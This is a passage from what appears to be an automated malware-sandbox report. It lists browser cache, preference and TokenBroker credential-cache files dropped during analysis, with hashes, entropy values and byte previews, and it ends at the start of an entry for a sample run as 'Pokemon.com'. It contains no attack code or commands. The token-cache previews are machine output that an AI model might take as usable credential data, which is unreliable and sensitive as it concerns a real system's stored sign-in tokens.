                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:0xXeZUSXkcVn:0Re5kcV
                                                                                                                                                                                                                                                                                    MD5:52E2839549E67CE774547C9F07740500
                                                                                                                                                                                                                                                                                    SHA1:B172E16D7756483DF0CA0A8D4F7640DD5D557201
                                                                                                                                                                                                                                                                                    SHA-256:F81B7B9CE24F5A2B94182E817037B5F1089DC764BC7E55A9B0A6227A7E121F32
                                                                                                                                                                                                                                                                                    SHA-512:D80E7351E4D83463255C002D3FDCE7E5274177C24C4C728D7B7932D0BE3EBCFEB68E1E65697ED5E162E1B423BB8CDFA0864981C4B466D6AD8B5E724D84B4203B
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:topTraffic_638004170464094982

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic_170540185939602997400506234197983529371

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):575056
                                                                                                                                                                                                                                                                                    Entropy (8bit):7.999649474060713
                                                                                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                                                                                    SSDEEP:12288:fXdhUG0PlM/EXEBQlbk19RrH76Im4u8C1jJodha:Ji80e9Rb7Tm4u8CnR
                                                                                                                                                                                                                                                                                    MD5:BE5D1A12C1644421F877787F8E76642D
                                                                                                                                                                                                                                                                                    SHA1:06C46A95B4BD5E145E015FA7E358A2D1AC52C809
                                                                                                                                                                                                                                                                                    SHA-256:C1CE928FBEF4EF5A4207ABAFD9AB6382CC29D11DDECC215314B0522749EF6A5A
                                                                                                                                                                                                                                                                                    SHA-512:FD5B100E2F192164B77F4140ADF6DE0322F34D7B6F0CF14AED91BACAB18BB8F195F161F7CF8FB10651122A598CE474AC4DC39EDF47B6A85C90C854C2A3170960
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:...._+jE.`..}....S..1....G}s..E....y".Wh.^.W.H...-...#.A...KR...9b........>k......bU.IVo...D......Y..[l.yx.......'c=..I0.....E.d...-...1 ....m../C...OQ.........qW..<:N.....38.u..X-..s....<..U.,Mi..._.......`.Y/.........^..,.E..........j@..G8..N.... ..Ea...4.+.79k.!T.-5W..!..@+..!.P..LDG.....V."....L.... .(#..$..&......C.....%A.T}....K_.S..'Q.".d....s....(j.D!......Ov..)*d0)."(..%..-..G..L.}....i.....m9;.....t.w..0....f?..-..M.c.3.....N7K.T..D>.3.x...z..u$5!..4..T.....U.O^L{.5..=E..'..;.}(|.6.:..f!.>...?M.8......P.D.J.I4.<...*.y.E....>....i%.6..Y.@..n.....M..r..C.f.;..<..0.H...F....h.......HB1]1....u..:...H..k....B.Q..J...@}j~.#...'Y.J~....I...ub.&..L[z..1.W/.Ck....M.......[.......N.F..z*.{nZ~d.V.4.u.K.V.......X.<p..cz..>*....X...W..da3(..g..Z$.L4.j=~.p.l.\.[e.&&.Y ...U)..._.^r0.,.{_......`S..[....(.\..p.bt.g..%.$+....f.....d....Im..f...W ......G..i_8a..ae..7....pS.....z-H..A.s.4.3..O.r.....u.S......a.}..v.-/..... ...a.x#./:...sS&U.().xL...pg

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic_638004170464094982

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:raw G3 (Group 3) FAX, byte-padded
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):460992
                                                                                                                                                                                                                                                                                    Entropy (8bit):7.999625908035124
                                                                                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                                                                                    SSDEEP:12288:KaRwcD8XXTZGZJHXBjOVX3xFttENr4+3eGPnKvJWXrydqb:KaR5oZ2MBFt8r4+3eG/URdqb
                                                                                                                                                                                                                                                                                    MD5:E9C502DB957CDB977E7F5745B34C32E6
                                                                                                                                                                                                                                                                                    SHA1:DBD72B0D3F46FA35A9FE2527C25271AEC08E3933
                                                                                                                                                                                                                                                                                    SHA-256:5A6B49358772DB0B5C682575F02E8630083568542B984D6D00727740506569D4
                                                                                                                                                                                                                                                                                    SHA-512:B846E682427CF144A440619258F5AA5C94CAEE7612127A60E4BD3C712F8FF614DA232D9A488E27FC2B0D53FD6ACF05409958AEA3B21EA2C1127821BD8E87A5CA
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:...2lI.5.<C.;.{....._+jE.`..}....-...#.A...KR...l.M0,s...).9..........x.......F.b......jU....y.h'....L<...*..Z..*%.*..._...g.4yu...........'c=..I0..........qW..<:N....<..U.,Mi..._......'(..U.9.!........u....7...4. ..Ea...4.+.79k.!T.-5W..!..@+..$..t|1.E..7F...+..xf....z&_Q...-.B...)8R.c....0.......B.M.Z...0....&v..<..H...3.....N7K.T..D>.8......P.D.J.I4.B.H.VHy...@.Wc.Cl..6aD..j.....E..*4..mI..X]2.GH.G.L...E.F.=.J...@}j~.#...'Y.L[z..1.W/.Ck....L..X........J.NYd........>...N.F..z*.{nZ~d.N..../..6.\L...Q...+.w..p...>.S.iG...0]..8....S..)`B#.v..^.*.T.?...Z.rz.D'.!.T.w....S..8....V.4.u.K.V.......W.6s...Y.).[.c.X.S..........5.X7F...tQ....z.L.X..(3#j...8...i.[..j$.Q....0...]"W.c.H..n..2Te.ak...c..-F(..W2.b....3.]......c.d|.../....._...f.....d....Im..g.b..R.q.<x*x...i2..r.I()Iat..b.j.r@K.+5..C.....nJ.>*P,.V@.....s.4.3..O.r.....smd7...L.....].u&1../t.*.......uXb...=@.....wv......]....#.{$.w......i.....|.....?....E7...}$+..t).E.U..Q..~.`.)..Y@.6.h.......%(

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local\uriCache

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):9
                                                                                                                                                                                                                                                                                    Entropy (8bit):3.169925001442312
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:CMzOn:CM6
                                                                                                                                                                                                                                                                                    MD5:B6F7A6B03164D4BF8E3531A5CF721D30
                                                                                                                                                                                                                                                                                    SHA1:A2134120D4712C7C629CDCEEF9DE6D6E48CA13FA
                                                                                                                                                                                                                                                                                    SHA-256:3D6F3F8F1456D7CE78DD9DFA8187318B38E731A658E513F561EE178766E74D39
                                                                                                                                                                                                                                                                                    SHA-512:4B473F45A5D45D420483EA1D9E93047794884F26781BBFE5370A554D260E80AD462E7EEB74D16025774935C3A80CBB2FD1293941EE3D7B64045B791B365F2B63
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:uriCache_

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local\uriCache_

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):179
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.022430934740917
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:YTyLSmafBoTfIeRDHtDozRLuLgfGBkGAeekVy8HfzXNPIAclQxVW0k:YWLSGTt1o9LuLgfGBPAzkVj/T8lQTw
                                                                                                                                                                                                                                                                                    MD5:EA08B33C7C39C36ADB5FA4B5DD1A57F7
                                                                                                                                                                                                                                                                                    SHA1:C5CF40D88FA6A0C9BF0631114A22FD6D5F4B306D
                                                                                                                                                                                                                                                                                    SHA-256:B75BA944257AFD760C1F18A9C5F87EEA92EB1684184D464D6BECE0CD144B7694
                                                                                                                                                                                                                                                                                    SHA-512:1EE54803312A06314EA3568DB81AB3AC76E66B766C69AC52FBE4B96F7A88AF31B354E831D01E525D4BEA9E80FD59A10D138B7753BBCA30E6AE2896CF38A03702
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"version":1,"cache_data":[{"file_hash":"da2d278eafa98c1f","server_context":"1;f94c025f-7523-6972-b613-ce2c246c55ce;unkn:100;0.01","result":1,"expiration_time":1735408037139528}]}

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Variations

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):86
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.3751917412896075
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:YQ3JYq9xSs0dMEJAELJ2rjozQw:YQ3Kq9X0dMgAEwj2
                                                                                                                                                                                                                                                                                    MD5:16B7586B9EBA5296EA04B791FC3D675E
                                                                                                                                                                                                                                                                                    SHA1:8890767DD7EB4D1BEAB829324BA8B9599051F0B0
                                                                                                                                                                                                                                                                                    SHA-256:474D668707F1CB929FEF1E3798B71B632E50675BD1A9DCEAAB90C9587F72F680
                                                                                                                                                                                                                                                                                    SHA-512:58668D0C28B63548A1F13D2C2DFA19BCC14C0B7406833AD8E72DFC07F46D8DF6DED46265D74A042D07FBC88F78A59CB32389EF384EC78A55976DFC2737868771
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"user_experience_metrics.stability.exited_cleanly":false,"variations_crash_streak":2}

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\a7bdbf4d-4a3a-42d0-9021-212598c13875.tmp

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):44690
                                                                                                                                                                                                                                                                                    Entropy (8bit):6.095609369045188
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4xkBVwufhDO6vP6O2cwAI16Lrf6YPAIfcGoup1Xl3jVu:z/Ps+wsI7yOEw6W6chu3VlXr4CRo1
                                                                                                                                                                                                                                                                                    MD5:F20F9CF8482E41020FF0C257736BD589
                                                                                                                                                                                                                                                                                    SHA1:AD0EEB9DBB9C6A5C6622E1C7410E9CDEE7C4581A
                                                                                                                                                                                                                                                                                    SHA-256:B9D5D1A48ACC352B51A58DA4A1A7C387CF68C27ED9A532807A883BA99E5A7FAD
                                                                                                                                                                                                                                                                                    SHA-512:FD74DACD812B8206BFC375F4F549492D391039F27B1B2FE60F501924C0777F8804B1376BBE931FCD0A130B2D77CF43B4D7A6F2ECF419D6091246DEFBDE1592D2
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\f5cafabf-8444-431d-9236-e446faf58e40.tmp

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):45839
                                                                                                                                                                                                                                                                                    Entropy (8bit):6.088043362930273
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:768:WMkbJrT8IeQc5d9IxKushDO6vP6O2cwAI16Lrf6YPAIf9N2aPiCAoYGoup1Xl3jn:WMk1rT8H19Ix6W698aPiRoYhu3VlXr4y
                                                                                                                                                                                                                                                                                    MD5:584447B3DFE0FE10846E85FCC52EBC52
                                                                                                                                                                                                                                                                                    SHA1:E657BEE187DD8BAB518DA9F5080068FC7AF68200
                                                                                                                                                                                                                                                                                    SHA-256:7523F746D2174066F8C127DCA5ECDF1721783FFCB6666AAE8A383A1BA152E112
                                                                                                                                                                                                                                                                                    SHA-512:D507C33525D55B3C5BDD2128DBFEF3B7181B22CDB454969842B530A9A16894FAD8934FB1F4F377EE17E1D407B079B3371F81E93C0ADC86E2CFA10075FD810282
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1735307236"},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG6qXtmMBDiyS59PvY7eCklyb4QcfFi7tpdwu3VBt1XNor

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\f8b0be45-3b06-4bc9-8c15-de8ae2e4b4e1.tmp

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):44608
                                                                                                                                                                                                                                                                                    Entropy (8bit):6.096343830118719
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkB3wufhDO6vP6O2cwAI16XidTyFBcF/BcGoup1Xl34:z/Ps+wsI7ynE+6W7chu3VlXr4CRo1
                                                                                                                                                                                                                                                                                    MD5:E29C801BEC9FC55B4C63775DBA84A2F3
                                                                                                                                                                                                                                                                                    SHA1:B9AC34D344D862252478DBC803CE801850612EEA
                                                                                                                                                                                                                                                                                    SHA-256:F33B79390DA52EE9A4E9F80973C01A56163ED100386AB4CA2E6568CA389E82F1
                                                                                                                                                                                                                                                                                    SHA-512:5D7A5BD4307298901BE844DF9063A198861C52D05E3C06D6C5AC8C3D4253CD3E42B3D045B74E369F65D322322CBAE77AFC2F7088901A7CFDF966B4095D0E7222
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\5a2a7058cf8d1e56c20e6b19a7c48eb2386d141b.tbres

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):2278
                                                                                                                                                                                                                                                                                    Entropy (8bit):3.8444856639206906
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:48:uiTrlKxrgxsxl9Il8uSuVXSxVnJzr1M/bLd65Sd1rc:mxYAQqNQ/bLdqx
                                                                                                                                                                                                                                                                                    MD5:C67D7405598BCAA711B207C0CA31CC3A
                                                                                                                                                                                                                                                                                    SHA1:4C2C16679196C4EE39E5EF0D71A021055B775A96
                                                                                                                                                                                                                                                                                    SHA-256:827B82A9929D95CAC5689FEF7C7BADD1579A001AAD77BC15B461FB706BD5F9FC
                                                                                                                                                                                                                                                                                    SHA-512:8B1754D2524EE6ECF6625461D72D6CF7E0DFAB702BC360012FBF71E7F18C9EA2A76705F3966AAC9FFFECA8BD21B718908B2F10F05A40D038694365AE3786917E
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".W.i.p.w.W.M.+.N.H.l.b.C.D.m.s.Z.p.8.S.O.s.j.h.t.F.B.s.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.H.L.K.O.G.5.Y.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.q.B.q.U.k.J.

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\cf7513a936f7effbb38627e56f8d1fce10eb12cc.tbres

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):4622
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.006595015238626
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:48:uiTrlKxExZxD9Il8upO0PZ+/vOUggzU7Gg66/SYqf0l+VZHmv9/91durbf6aZf4m:HY/O0hU3zU7GwKdsmU9/tur2aZf0va9N
                                                                                                                                                                                                                                                                                    MD5:E274DFB7FF8F67ED444334FBA9CAAB26
                                                                                                                                                                                                                                                                                    SHA1:20481FCDBAF90C85C66D1DDB688B2186048C2AE3
                                                                                                                                                                                                                                                                                    SHA-256:BA900C7B98B173643E8F4D70C5A14F82D1777ACC175EB31BE01E45BDCC2C001A
                                                                                                                                                                                                                                                                                    SHA-512:14F52F963BB063FAFEFBB334094774D6EA1DAAF42ED894C0CC683E054577DEA90EB237F21C5E2CE5B41801D7A0F0223745E6929D17AD242E013871481CB3292F
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".z.3.U.T.q.T.b.3.7./.u.z.h.i.f.l.b.4.0.f.z.h.D.r.E.s.w.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".m.r.0.T.H.m.Z.Y.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.w.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.q.B.q.U.k.J.

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\e8ddd4cbd9c0504aace6ef7a13fa20d04fd52408.tbres

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):2684
                                                                                                                                                                                                                                                                                    Entropy (8bit):3.8954840203733108
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:48:uiTrlKx68Wa7xHJxl9Il8u794l0m58ZTK/6jOj+w8N2N+ILc747lud/vc:anYg0m58G6jKSN2NtLc7O
                                                                                                                                                                                                                                                                                    MD5:902FFA67B64C0AAF59E8FD7B6337A9CB
                                                                                                                                                                                                                                                                                    SHA1:F0BBDA989C0BC246819FE31488CFFD48F1517A25
                                                                                                                                                                                                                                                                                    SHA-256:A0984636F09C177031D634AF24ABB2B34EB644EC132DCA21FEC8AD75DFCED750
                                                                                                                                                                                                                                                                                    SHA-512:18B4B18795FD9572317B461ECC7A8E2991D73CB5E0428453217A65665DD922AFF620A368E8C1FF9B4DA8A72B2CB55AC381CF211DE1BE0A3DF6576C6898A4272F
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".6.N.3.U.y.9.n.A.U.E.q.s.5.u.9.6.E./.o.g.0.E./.V.J.A.g.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".X.a.i.K.T.j.d.3.3.A.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.q.B.q.U.k.J.

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\json[1].json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\208079\Pokemon.com
